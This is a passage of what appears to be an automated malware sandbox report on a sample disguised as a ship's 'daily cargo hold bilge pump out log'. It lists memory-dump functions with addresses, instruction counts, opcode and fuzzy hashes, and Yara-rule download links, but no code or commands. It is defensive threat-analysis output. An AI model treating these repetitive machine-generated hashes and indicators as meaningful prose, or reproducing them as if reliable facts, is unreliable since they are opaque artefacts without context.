Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca12662d0598e395ec4ec0e49cc279f2039ec7cfc26346b19138076812dc3166
Instruction ID: f027e896df03cdf0108708ba06dfe36eaacde0667f5c9067374bcbb8e5325061
Opcode Fuzzy Hash: ca12662d0598e395ec4ec0e49cc279f2039ec7cfc26346b19138076812dc3166
Instruction Fuzzy Hash: B6B19171B10614CFD708BF79E88926DBBF2FF89704F414968D08997754DE38A806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0734B705 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd75487db15b627bc375531c5b2b404a00bde5f84c5d95e85f8b1e8f4ffb1d6d
Instruction ID: ea18c49852f7e4ac3164712a0fd8f0cdb8ca5429c51fc1065f2443e5d98ec865
Opcode Fuzzy Hash: dd75487db15b627bc375531c5b2b404a00bde5f84c5d95e85f8b1e8f4ffb1d6d
Instruction Fuzzy Hash: A82209B1B182448FD705FFB8E85866CFFF1BF85204F1944AAD489D7292DE389846CB52

Uniqueness

Uniqueness Score: -1.00%

Function 07349D81 Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bcfa8b0f93f5912380be1b4fba2edd2c36ef82cc721696069e6ac666d4ccaa
Instruction ID: f34fe1b11ca29ddbe0021a0ed4ef2daf0517c6cda3e217554c0acb22b8eacd88
Opcode Fuzzy Hash: 69bcfa8b0f93f5912380be1b4fba2edd2c36ef82cc721696069e6ac666d4ccaa
Instruction Fuzzy Hash: BDF19F70B10614CBD708FFB9E58962DB7F6BF88604F508968E449E7354EE38AD06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0734B120 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288bcf386f8d12331d6787bfa0ffe1ef23e500b542c9743a9fd0ae216c038291
Instruction ID: 243f1cb788ca4dfdfe8a55775da164c3fde6d6b2fa262eaf49da466808100eea
Opcode Fuzzy Hash: 288bcf386f8d12331d6787bfa0ffe1ef23e500b542c9743a9fd0ae216c038291
Instruction Fuzzy Hash: 08E19E71B106158BD708FFB9E48926DBBF6FF88614F444868D489A7344DE38EC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0734F190 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a293f5d7ff28b771fd0304a531affb7ba0e7adf171dfa3b60eb25b63d58f626a
Instruction ID: 0f95d11e3b53a62f549cd6429ccf3cc16a901cda357cbd1f316e254e38f4db8b
Opcode Fuzzy Hash: a293f5d7ff28b771fd0304a531affb7ba0e7adf171dfa3b60eb25b63d58f626a
Instruction Fuzzy Hash: DCF1BDB5E14619CBEB08AF79E54969CBBF1FB88300F084469D44AE7750DE389D81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05C78B53 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcecdbd2b4fc1040e3f7116ca858ee2655ff01be2188777f5bb9d534d314f605
Instruction ID: 217eca9e56b70c96842053a85f0f3d81294ee50d523afbc482fe3cd50576d1e2
Opcode Fuzzy Hash: bcecdbd2b4fc1040e3f7116ca858ee2655ff01be2188777f5bb9d534d314f605
Instruction Fuzzy Hash: 8302F6346001089FCB44DF68D598AAD7BF2FF89314F1585A8E50A9B7A6CB31ED86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0252A7F0 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e424dd6bd3efd5d83b0ee1df6314a5ef6aff071afa930bd0492b8575ecbcc2
Instruction ID: 88777e8e41949172fd8894d35bed9c0ec249a806e0001d32c2c8e8419bcad8ee
Opcode Fuzzy Hash: a0e424dd6bd3efd5d83b0ee1df6314a5ef6aff071afa930bd0492b8575ecbcc2
Instruction Fuzzy Hash: 05F13E72A006258FCB05CF68C584AADBBF6FF8D314B1684A9E405AB3E1DB34EC45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 073497C0 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636ab36e496f183e26a7ddbb7ee9caf19f8e59f2f749ce590b3f881a1a097f84
Instruction ID: 140af798e7847880e292611a81e8b750ba8d696281315a7a782760fc7c0beaf7
Opcode Fuzzy Hash: 636ab36e496f183e26a7ddbb7ee9caf19f8e59f2f749ce590b3f881a1a097f84
Instruction Fuzzy Hash: 4DC1D335B10615CBDB08BFB9E48922EBBF6FF88604F414968D48997344DE38AD45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0734EC0F Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c620a0eda7a8789df7802f6dc89c30ae5ccb74b92757344ed6ed0932ef81ca
Instruction ID: b52449ce0ad03ef0008bda1520fd16e798c58fcc82d6c87f7de9239d49c7c951
Opcode Fuzzy Hash: 06c620a0eda7a8789df7802f6dc89c30ae5ccb74b92757344ed6ed0932ef81ca
Instruction Fuzzy Hash: 6AC18170F10605CFD708BFB9E48966DBBF6BF88704F454968E44997364DE38A80ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 0734AA5C Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8662ad07b493d88dc158c1387ef8d2c331e066b1120225bf3f1892de0edd38
Instruction ID: c9c8438c8da4b8c8ab441375dde8adf436d6ab376ddb4f0000665c43be722610
Opcode Fuzzy Hash: 7d8662ad07b493d88dc158c1387ef8d2c331e066b1120225bf3f1892de0edd38
Instruction Fuzzy Hash: AFA1B371B142148FDB04BFB9E44826DBBF6BF88604F414968D488E7350DE38AC46CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 07349777 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02b1ac091c0bd926084af6591117a804e182c689372d77356dfed70dcb03f46
Instruction ID: 5e949b228d139817ac701a1cbab762d2898eed2f2245dd6ee498c0f94f54dca6
Opcode Fuzzy Hash: d02b1ac091c0bd926084af6591117a804e182c689372d77356dfed70dcb03f46
Instruction Fuzzy Hash: A6A1C035B04611CFDB09BFB8E44922EBBF1FF89604F4449A8D48997355DE38AC46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0734D910 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac76be3ff61c5e70e8f099b74440ddd2d300e7ad4dfca0813f2a890069b2825
Instruction ID: 819d1fe8ce0ab6d901fd1b4a74b6232ef4936feb980a39bf4c6d2f59a4bb59ca
Opcode Fuzzy Hash: fac76be3ff61c5e70e8f099b74440ddd2d300e7ad4dfca0813f2a890069b2825
Instruction Fuzzy Hash: 0E9184717187009BD709BF79E59922EB7E6AFC9614F41886CE0C9C7354DE38A80AC753

Uniqueness

Uniqueness Score: -1.00%

Function 0734D920 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3cf380ad882cba36a97b5ae98ccdfd2e51b2d9e06525efd22351457533533d9
Instruction ID: 2b7754b06ec19b69d7ab84b706884da6b9e31b9cc541b917d657912fae273b8e
Opcode Fuzzy Hash: e3cf380ad882cba36a97b5ae98ccdfd2e51b2d9e06525efd22351457533533d9
Instruction Fuzzy Hash: 509173717147009BD708BF79E59922EB7E6AFC9614F41886CE0C987354DE38A80ACB53

Uniqueness

Uniqueness Score: -1.00%

Function 073497B9 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c59c30c49a72d14f954ebee546aa9ef83d06cf82efb3452f1051ac0f6748c0
Instruction ID: 821af0b3a7a0c2c19add19d7012081d17d95747f19680933d682c18d09c56d53
Opcode Fuzzy Hash: e6c59c30c49a72d14f954ebee546aa9ef83d06cf82efb3452f1051ac0f6748c0
Instruction Fuzzy Hash: 4F91A075B10615CBDB08BFB8E48922EBBF2FF88604F444968D489D7354DE38AD45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0252DCF8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f0f358fe7dbffa75f0b15e278b04fb74991a7f387132636e39a88b0055426a
Instruction ID: 5369a45584cd5c264076f1ee89522fe1571e9e7f338013ef01390c9e2fd48040
Opcode Fuzzy Hash: 30f0f358fe7dbffa75f0b15e278b04fb74991a7f387132636e39a88b0055426a
Instruction Fuzzy Hash: 2A81C470F011288BCB18DF68C4846AEBBF3BFCA710F258559D815AB3D5CB319C458B98

Uniqueness

Uniqueness Score: -1.00%

Function 02526F78 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb25970a895b16790096fcc8efe3d79ec56b8b72157af11328ebbbec8f9416ff
Instruction ID: 6d4c2023794fd144486f1f12cf9aebfbe6424eb07695fb1b0c8c58b193169e94
Opcode Fuzzy Hash: bb25970a895b16790096fcc8efe3d79ec56b8b72157af11328ebbbec8f9416ff
Instruction Fuzzy Hash: E461BF313002258FDB25DB39885473ABEAABF8A354F144929E806CB3D9DF34DC49D799

Uniqueness

Uniqueness Score: -1.00%

Function 02525708 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc79f0b30a0c76b3b7ec9c44c036df8f5643494185547f25150c3d2a5b3916a
Instruction ID: 6e21a079f7f3f336dacf327b187d826fd6cf0a5d34f2619661366a19e59b26df
Opcode Fuzzy Hash: 8cc79f0b30a0c76b3b7ec9c44c036df8f5643494185547f25150c3d2a5b3916a
Instruction Fuzzy Hash: 1051F430B003149FDB089B78D994B6E7BABFB89310F548829E515AB3D8DA359C0DCB94

Uniqueness

Uniqueness Score: -1.00%

Function 05C7AD80 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522e8c1b759e936f67d410e2089134468c870b218e3f10606f07fb44c235844e
Instruction ID: 72f4de21ef6fe5950294e857246dbf025711975d710426014886591b42386ed6
Opcode Fuzzy Hash: 522e8c1b759e936f67d410e2089134468c870b218e3f10606f07fb44c235844e
Instruction Fuzzy Hash: E471E5306406048FCB54DF28C998E6ABBF2FF85315F1589A9D44A8B376DB31ED45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05C75E70 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20caba8e1d129b198017589c3132e296acd7ac590f5fc739c2cd93cd18014e98
Instruction ID: a86cac48444bd4c9c4840a12fbc702677fdc88b3db35fdcbc9d7d32dd570cb56
Opcode Fuzzy Hash: 20caba8e1d129b198017589c3132e296acd7ac590f5fc739c2cd93cd18014e98
Instruction Fuzzy Hash: 2351CD317002148FD714EB78D554AAEBBA6EF8A304F1488AAD016EB7A1CB75ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05C78990 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5097c78a53620b78dfbed573bcdcfbc808a8fc4feb4dc23ccd339b0fa3d4aaa
Instruction ID: 265c71a4cab56dedeff97309d6f2f32aac622a6cbee9864f6728243e3f663dae
Opcode Fuzzy Hash: e5097c78a53620b78dfbed573bcdcfbc808a8fc4feb4dc23ccd339b0fa3d4aaa
Instruction Fuzzy Hash: 3541B0317006488FC719EB38D55462A7BE2EF99344F148AB8D0568B7D1DF39DD06C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0734A7AE Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f2ddb815724982b008eae5cac0916c2af32684dc1739c09c180cd9be45ab5cf
Instruction ID: 652a023a4eb079fcfca6988b39613e9c3eeb302be8a1d724e6106e2f8bbdda90
Opcode Fuzzy Hash: 2f2ddb815724982b008eae5cac0916c2af32684dc1739c09c180cd9be45ab5cf
Instruction Fuzzy Hash: D45167B0D043898FDB09CFA8C854B9DBFF1EF49314F14806EE459AB2A1C774A842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05C77D54 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c4066668a5f0f6d3f5833c0db77ecd0413a5e17cb25b4cbbf405029d3f5078
Instruction ID: 58f60b2b447d5b84aea14786de617790e162e07f3c677bced1fce1fe8b909ddf
Opcode Fuzzy Hash: e2c4066668a5f0f6d3f5833c0db77ecd0413a5e17cb25b4cbbf405029d3f5078
Instruction Fuzzy Hash: F94166303006089FDB24EB29C894B7AB3B6FF84311F104969E15A8B7A4DF71ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C79E90 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac0a2e93c2355ee67f55760dde440de8388aa33f4b432136170e57d25e1cee1
Instruction ID: 31a83eefdb6c38f0d914ed511c22c61e59524f79307015d858483a830dabb4c9
Opcode Fuzzy Hash: bac0a2e93c2355ee67f55760dde440de8388aa33f4b432136170e57d25e1cee1
Instruction Fuzzy Hash: A54153343006089FDB24EF24C898F7AB3B6FF85315F144969D15A8BBA4DB71E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0734A7D8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081c25738b44570bed556b0a368a3bdb11d42937d157c994b3b0abc7f9273d5e
Instruction ID: d9de44ae229319fce1ea58b94c1e42f50781682c678be3e2c0addfa2efc3abda
Opcode Fuzzy Hash: 081c25738b44570bed556b0a368a3bdb11d42937d157c994b3b0abc7f9273d5e
Instruction Fuzzy Hash: 7B41F7B4D402599FEB18CFA9C844B9DBBF5FF48314F14C029E819AB250D774A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05C7C5F8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e54a764010bdd3c18dabf7f593b80ee54675d9de63c88e5a9efbdf1f5caf8901
Instruction ID: 97ab3c1a5d3e0bc1e6a90f9962083afd6d04499173263ee47bbe0680138d1bc6
Opcode Fuzzy Hash: e54a764010bdd3c18dabf7f593b80ee54675d9de63c88e5a9efbdf1f5caf8901
Instruction Fuzzy Hash: 0C318B34304A198FDB15EF38D45862E7BE6BF89210B148A69E01AC77E1DF34DE42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02524B70 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77bd20e9c5c6c2207cae1f7deda799b4782bdf4fe06bbc632be06c067dcb1c40
Instruction ID: ef0ad77242f1149a34823084e6d9fa295887363831a978b224619b31de9dfae1
Opcode Fuzzy Hash: 77bd20e9c5c6c2207cae1f7deda799b4782bdf4fe06bbc632be06c067dcb1c40
Instruction Fuzzy Hash: DB314771B002229FDB106B79980432EBAE9BF89310F14453AE90AEB3C1EF35C845C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 05C7C608 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc3448bfa1cee25a3d8dd3655522648873a3f9733479c4aa96d83af87b7e60f
Instruction ID: defc4d42e13c9394d17190b7075578573e2b4f9dc0533c377613ee2acebb805f
Opcode Fuzzy Hash: 7fc3448bfa1cee25a3d8dd3655522648873a3f9733479c4aa96d83af87b7e60f
Instruction Fuzzy Hash: C0318C343046198FDB14EF38D45862E7BF6BF89210B108A69E01AC77A1DF34EE42CB85

Uniqueness

Uniqueness Score: -1.00%

Function 05C79B74 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3512a2b3f2c6bb0e086b205e12d3163d2fa41d13afccd403ce76eaabdf30cd6
Instruction ID: a57a08f600a2640820e4f452ce78e8bae66f7197507f57d330069f64cc776a40
Opcode Fuzzy Hash: b3512a2b3f2c6bb0e086b205e12d3163d2fa41d13afccd403ce76eaabdf30cd6
Instruction Fuzzy Hash: 5531EA343106188FDB14DB29C848F6AB7E6BF89718F1588A9E41ACB771EE70ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05C7B123 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405e254652443f23d8f6808588fda0311133672f8728b2f8c5e35f62ece4e5b9
Instruction ID: 4c3ca633788d2a566d0531ed59d3577d3a697ed596a106b6aae4feaef6ddba47
Opcode Fuzzy Hash: 405e254652443f23d8f6808588fda0311133672f8728b2f8c5e35f62ece4e5b9
Instruction Fuzzy Hash: A23139713046148FD714DB29C884F6A77E6FF88718F1588A9E41ACB771EA30ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0734A68E Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a93307aaca1fd45ab52e9b4820492180095c09289bc89fcfc0ceb9bbbb9743
Instruction ID: 921091885524c1e2a3873d40a1b0dbae46624857e37dfa69c4e96437351ac99c
Opcode Fuzzy Hash: 93a93307aaca1fd45ab52e9b4820492180095c09289bc89fcfc0ceb9bbbb9743
Instruction Fuzzy Hash: 6B316870B093418FD306ABB8E85925DBFF1EF46618F0545AAC4C5DB292DA385D0AC7A3

Uniqueness

Uniqueness Score: -1.00%

Function 05C7F309 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33a414360030f7f252808190474f45bfddcd1f1896fff5463409f3a6b3def95
Instruction ID: d39fcde22154a8aaf6ff07eb061a48e55ae8accfe9bfaaf6345957cc9f736343
Opcode Fuzzy Hash: c33a414360030f7f252808190474f45bfddcd1f1896fff5463409f3a6b3def95
Instruction Fuzzy Hash: 5B3136757002199FCB149F68C884AADBBB6FF88320B2046A9E525DB3B1CB71DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05C7F318 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f22287eeb132cb81c6b4eac8d366be8d6bbb5f7b3e16c0c5a0ebf13dd266a36
Instruction ID: 29c25fe93565a9f55509b86c1335581033cca793dd404b51d2ea5f2caa7a1e88
Opcode Fuzzy Hash: 5f22287eeb132cb81c6b4eac8d366be8d6bbb5f7b3e16c0c5a0ebf13dd266a36
Instruction Fuzzy Hash: 5C313A757002199FCB14DF68C884A6DBBB6FF88720F204669E5259B3B1CB71DD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02526150 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8808c939f6b71ce9df6a33d6adb9c8de2cedf20a3cf0aab3568105fa1a158721
Instruction ID: 7a5fcf1320b8edee90de969206891e4f76913286efbb4ba81f05c49da71afb10
Opcode Fuzzy Hash: 8808c939f6b71ce9df6a33d6adb9c8de2cedf20a3cf0aab3568105fa1a158721
Instruction Fuzzy Hash: 7C318E31600219AFDF059F64E85476E7B7BFB88314F008019F9069B2D5CB35DD65DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02524B5F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

